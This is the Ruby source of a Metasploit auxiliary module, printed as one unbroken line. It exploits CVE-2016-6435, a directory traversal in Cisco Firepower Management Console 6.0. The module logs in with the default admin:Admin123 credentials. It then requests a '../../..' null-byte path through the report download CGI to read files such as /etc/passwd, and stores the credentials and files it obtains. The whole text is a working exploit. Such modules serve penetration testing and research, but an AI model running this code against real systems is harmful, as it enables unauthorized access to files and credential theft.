## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal", 'Description' => %q{ This module exploits a directory traversal vulnerability in Cisco Firepower Management under the context of www user. Authentication is required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt', # Original discovery && PoC 'sinn3r', # Metasploit module ], 'References' => [ ['CVE', '2016-6435'], ['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking'] ], 'DisclosureDate' => '2016-10-10', 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SSLVersion' => 'Auto' } )) register_options( [ # admin:Admin123 is the default credential for 6.0.1 OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']) ]) end def do_login(ip) console_user = datastore['USERNAME'] console_pass = datastore['PASSWORD'] uri = normalize_uri(target_uri.path, 'login.cgi') print_status("Attempting to login in as #{console_user}:#{console_pass}") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'username' => console_user, 'password' => console_pass, 'target' => '' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to log in.') end res_cookie = res.get_cookies if res.code == 302 && res_cookie.include?('CGISESSID') cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first vprint_status("CGI Session ID: #{cgi_sid}") print_good("Authenticated as #{console_user}:#{console_pass}") report_cred(ip: ip, user: console_user, password: console_pass) return cgi_sid end nil end def report_cred(opts) service_data = { address: opts[:ip], port: rport, service_name: 'cisco', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def download_file(cgi_sid, file) file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00" print_status("Requesting: #{file_path}") send_request_cgi({ 'method' => 'GET', 'cookie' => "CGISESSID=#{cgi_sid}", 'uri' => normalize_uri(target_uri.path, 'events/reports/view.cgi'), 'vars_get' => { 'download' => '1', 'files' => file_path } }) end def remote_file_exists?(res) ( res.headers['Content-Disposition'] && res.headers['Content-Disposition'].match(/attachment; filename=/) && res.headers['Content-Type'] && res.headers['Content-Type'] == 'application/octet-stream' ) end def save_file(res, ip) fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH']) path = store_loot( 'cisco.https', 'application/octet-stream', ip, res.body, fname ) print_good("File saved in: #{path}") end def run_host(ip) cgi_sid = do_login(ip) unless cgi_sid fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID') end res = download_file(cgi_sid, datastore['FILEPATH']) if res.nil? print_error("Connection timed out while downloading: #{datastore['FILEPATH']}") elsif remote_file_exists?(res) save_file(res, ip) else print_error("Remote file not found: #{datastore['FILEPATH']}") end end end